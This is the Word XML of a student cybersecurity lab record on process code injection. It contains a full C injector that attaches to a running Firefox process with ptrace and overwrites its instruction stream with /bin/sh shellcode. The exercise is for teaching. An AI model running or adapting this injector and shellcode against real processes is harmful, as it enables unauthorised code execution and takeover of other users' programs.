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45F7" w14:textId="29B8B3ED" w:rsidR="003407B4" w:rsidRDefault="00B07174" w:rsidP="00B07174">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="8733"/>
        </w:tabs>
        <w:spacing w:after="430"/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="74EBFFE0" w14:textId="77777777" w:rsidR="003407B4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="1043"/>
          <w:tab w:val="center" w:pos="1977"/>
          <w:tab w:val="center" w:pos="4138"/>
          <w:tab w:val="center" w:pos="4858"/>
          <w:tab w:val="center" w:pos="5578"/>
          <w:tab w:val="center" w:pos="6298"/>
          <w:tab w:val="center" w:pos="7018"/>
          <w:tab w:val="center" w:pos="8617"/>
        </w:tabs>
        <w:spacing w:after="20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Ex. No.: 5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">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Date:10.09.20204</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC42AFD" w14:textId="77777777" w:rsidR="003407B4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="158"/>
        <w:ind w:left="0" w:right="413" w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>PROCESS CODE INJECTION</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB1F411" w14:textId="77777777" w:rsidR="003407B4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="202"/>
        <w:ind w:left="537" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41ED06F1" w14:textId="77777777" w:rsidR="003407B4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="205"/>
        <w:ind w:left="532"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Aim:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D30326E" w14:textId="77777777" w:rsidR="003407B4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="158"/>
        <w:ind w:left="532" w:right="1043"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">To do process code injection on Firefox using ptrace system call. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0B687E" w14:textId="77777777" w:rsidR="003407B4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="207"/>
        <w:ind w:left="537" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B4B55E" w14:textId="77777777" w:rsidR="003407B4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="205"/>
        <w:ind w:left="532"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Algorithm:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="649E99E8" w14:textId="77777777" w:rsidR="003407B4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="208"/>
        <w:ind w:right="1043" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Find out the pid of the running Firefox program. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3383536A" w14:textId="77777777" w:rsidR="003407B4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="208"/>
        <w:ind w:right="1043" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Create the code injection file. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5023E632" w14:textId="77777777" w:rsidR="003407B4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="207"/>
        <w:ind w:right="1043" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Get the pid of the Firefox from the command line arguments. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C42DA18" w14:textId="77777777" w:rsidR="003407B4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="205"/>
        <w:ind w:right="1043" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Allocate memory buffers for the shellcode. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB57A98" w14:textId="77777777" w:rsidR="003407B4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="208"/>
        <w:ind w:right="1043" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Attach to the victim process with PTRACE_ATTACH. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2D1C0A" w14:textId="77777777" w:rsidR="003407B4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="208"/>
        <w:ind w:right="1043" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Get the register values of the attached process. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6999B187" w14:textId="77777777" w:rsidR="003407B4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="208"/>
        <w:ind w:right="1043" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Use PTRACE_POKETEXT to insert the shellcode. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483C78A9" w14:textId="77777777" w:rsidR="003407B4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="156"/>
        <w:ind w:right="1043" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Detach from the victim process using PTRACE_DETACH </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52EDC575" w14:textId="77777777" w:rsidR="003407B4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="537" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06BD0016" w14:textId="77777777" w:rsidR="003407B4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="204"/>
        <w:ind w:left="537" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB8F2A8" w14:textId="77777777" w:rsidR="003407B4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="439" w:lineRule="auto"/>
        <w:ind w:left="532" w:right="7989"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Output: injector.c program: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2141E662" w14:textId="77777777" w:rsidR="003407B4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="532" w:right="1043"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"># include &lt;stdio.h&gt;//C standard input output </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782FFEC9" w14:textId="77777777" w:rsidR="003407B4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="532" w:right="1043"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"># include &lt;stdlib.h&gt;//C Standard General Utilities Library </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644E6645" w14:textId="77777777" w:rsidR="003407B4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="532" w:right="1043"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"># include &lt;string.h&gt;//C string lib header </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB64BA5" w14:textId="77777777" w:rsidR="003407B4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="532" w:right="1043"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"># include &lt;unistd.h&gt;//standard symbolic constants and types  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2280C5F8" w14:textId="77777777" w:rsidR="003407B4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="532" w:right="1043"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"># include &lt;sys/wait.h&gt;//declarations for waiting </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41378A71" w14:textId="77777777" w:rsidR="003407B4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="532" w:right="1043"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"># include &lt;sys/ptrace.h&gt;//gives access to ptrace functionality </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC6F89B" w14:textId="77777777" w:rsidR="003407B4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="532" w:right="1043"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"># include &lt;sys/user.h&gt;//gives ref to regs </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3C06D6" w14:textId="77777777" w:rsidR="003407B4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="47"/>
        <w:ind w:left="537" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDEFFE2" w14:textId="77777777" w:rsidR="003407B4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="532" w:right="6397"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">//The shellcode that calls /bin/sh char shellcode[]={ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190B472A" w14:textId="77777777" w:rsidR="003407B4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="532" w:right="1043"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97" </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B5C35D" w14:textId="77777777" w:rsidR="003407B4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="532" w:right="1043"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">"\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05" </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3814ADF6" w14:textId="77777777" w:rsidR="003407B4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="537"/>
          <w:tab w:val="center" w:pos="1348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}; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6294C8" w14:textId="77777777" w:rsidR="003407B4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="44"/>
        <w:ind w:left="537" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF26B0A" w14:textId="77777777" w:rsidR="003407B4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="532" w:right="1043"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">//header for our program. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0122D1" w14:textId="77777777" w:rsidR="003407B4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="532" w:right="1043"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">void header() </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A19101" w14:textId="77777777" w:rsidR="003407B4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="434"/>
        <w:ind w:left="532" w:right="4852"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">{  </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">printf("----Memory bytecode injector-----\n"); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1244AE7B" w14:textId="77777777" w:rsidR="003407B4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">CSE(Cyber Security) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE6535C" w14:textId="77777777" w:rsidR="003407B4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="165"/>
        <w:ind w:left="7181"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>2nd year</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7218F6D7" w14:textId="77777777" w:rsidR="003407B4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="532" w:right="1043"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">} </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C29136" w14:textId="77777777" w:rsidR="003407B4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="44"/>
        <w:ind w:left="537" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D49AF3E" w14:textId="77777777" w:rsidR="003407B4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="532" w:right="1043"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">//main program notice we take command line options </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED4A335" w14:textId="77777777" w:rsidR="003407B4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="532" w:right="1043"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">int main(int argc,char**argv) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E85FF3F" w14:textId="77777777" w:rsidR="003407B4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="532" w:right="1043"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">{ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059DE94F" w14:textId="77777777" w:rsidR="003407B4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="537"/>
          <w:tab w:val="center" w:pos="20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int i,size,pid=0; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160C31E0" w14:textId="77777777" w:rsidR="003407B4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="537"/>
          <w:tab w:val="center" w:pos="427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struct user_regs_struct reg;//struct that gives access to registers </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE21E5D" w14:textId="77777777" w:rsidR="003407B4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="537"/>
          <w:tab w:val="center" w:pos="405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                      //note that this regs will be in x64 for me  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B3B445" w14:textId="77777777" w:rsidR="003407B4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="537"/>
          <w:tab w:val="center" w:pos="4353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                      //unless your using 32bit then eip,eax,edx etc... </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1796DB" w14:textId="77777777" w:rsidR="003407B4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="46"/>
        <w:ind w:left="537" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A031698" w14:textId="77777777" w:rsidR="003407B4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="537"/>
          <w:tab w:val="center" w:pos="1754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char*buff; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53868030" w14:textId="77777777" w:rsidR="003407B4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="46"/>
        <w:ind w:left="537" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F08967" w14:textId="77777777" w:rsidR="003407B4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="537"/>
          <w:tab w:val="center" w:pos="1689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header(); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD417B3" w14:textId="77777777" w:rsidR="003407B4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
        <w:ind w:left="537" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229DFB5B" w14:textId="77777777" w:rsidR="003407B4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="537"/>
          <w:tab w:val="center" w:pos="4423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//we get the command line options and assign them appropriately! </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C096EB" w14:textId="77777777" w:rsidR="003407B4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="51"/>
        <w:ind w:left="537" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746A8C6F" w14:textId="77777777" w:rsidR="003407B4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="532" w:right="5493"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">pid=atoi(argv[1]);  </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">size=sizeof(shellcode);  </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">//allocate a char size memory  </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">buff=(char*)malloc(size);  </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">//fill the buff memory with 0s upto size  </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">memset(buff,0x0,size); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369A8113" w14:textId="77777777" w:rsidR="003407B4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="537"/>
          <w:tab w:val="center" w:pos="33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//copy shellcode from source to destination </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60568E64" w14:textId="77777777" w:rsidR="003407B4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="537"/>
          <w:tab w:val="center" w:pos="3312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memcpy(buff,shellcode,sizeof(shellcode)); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A18005" w14:textId="77777777" w:rsidR="003407B4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="49"/>
        <w:ind w:left="537" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B93D06" w14:textId="77777777" w:rsidR="003407B4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="537"/>
          <w:tab w:val="center" w:pos="23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//attach process of pid </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E66D6BC" w14:textId="77777777" w:rsidR="003407B4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="537"/>
          <w:tab w:val="center" w:pos="3011"/>
        </w:tabs>
        <w:spacing w:after="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ptrace(PTRACE_ATTACH,pid,0,0); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A48D60B" w14:textId="77777777" w:rsidR="003407B4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="49"/>
        <w:ind w:left="537" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674845A0" w14:textId="77777777" w:rsidR="003407B4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="532" w:right="4992"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">//wait for child to change state  </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">wait((int*)0); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA3FEF6" w14:textId="77777777" w:rsidR="003407B4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
        <w:ind w:left="537" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60791C86" w14:textId="77777777" w:rsidR="003407B4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="537"/>
          <w:tab w:val="center" w:pos="45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//get process pid registers i.e Copy the process pid's general-purpose </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214835DF" w14:textId="77777777" w:rsidR="003407B4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="537"/>
          <w:tab w:val="center" w:pos="31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//or floating-point registers,respectively,  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4762C8" w14:textId="77777777" w:rsidR="003407B4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="537"/>
          <w:tab w:val="center" w:pos="276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//to the address reg in the tracer </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA58A64" w14:textId="77777777" w:rsidR="003407B4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="537"/>
          <w:tab w:val="center" w:pos="32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ptrace(PTRACE_GETREGS,pid,0,&amp;reg); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBB0236" w14:textId="77777777" w:rsidR="003407B4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="537"/>
          <w:tab w:val="center" w:pos="3852"/>
        </w:tabs>
        <w:spacing w:after="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printf("Writing EIP 0x%x, process %d\n",reg.rip,pid); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5089F6" w14:textId="77777777" w:rsidR="003407B4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="53"/>
        <w:ind w:left="537" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C992FD" w14:textId="77777777" w:rsidR="003407B4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="532" w:right="1043"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">//Copy the word data to the address buff in the process's memory  </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">for(i=0;i&lt;size;i++){ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4118A79C" w14:textId="77777777" w:rsidR="003407B4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="537"/>
          <w:tab w:val="center" w:pos="415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ptrace(PTRACE_POKETEXT,pid,reg.rip+i,*(int*)(buff+i)); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E2F23F" w14:textId="77777777" w:rsidR="003407B4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="532" w:right="1043"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">} </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42744E47" w14:textId="77777777" w:rsidR="003407B4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="532" w:right="1043"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    //detach from the process and free buff memory </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02EBC925" w14:textId="77777777" w:rsidR="003407B4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="532" w:right="4665"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">ptrace(PTRACE_DETACH,pid,0,0);  </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">free(buff); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9051A1" w14:textId="77777777" w:rsidR="003407B4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="537"/>
          <w:tab w:val="center" w:pos="1666"/>
          <w:tab w:val="center" w:pos="26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return 0; </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D986860" w14:textId="77777777" w:rsidR="003407B4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="532" w:right="1043"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">} </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE92861" w14:textId="77777777" w:rsidR="003407B4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="153"/>
        <w:ind w:left="0" w:right="5405" w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A77BA8B" wp14:editId="6E3C511E">
            <wp:extent cx="2521966" cy="296862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966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BEF4AB" w14:textId="77777777" w:rsidR="003407B4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="158"/>
        <w:ind w:left="532" w:right="1043"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Result: </w:t>
      </w:r>
      <w:r>
        <w:t>Thus, the process code injection on Firefox has been successfully executed.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61BD1F62" w14:textId="77777777" w:rsidR="003407B4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="537" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F69D595" w14:textId="77777777" w:rsidR="003407B4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="53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A338CF3" w14:textId="77777777" w:rsidR="003407B4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
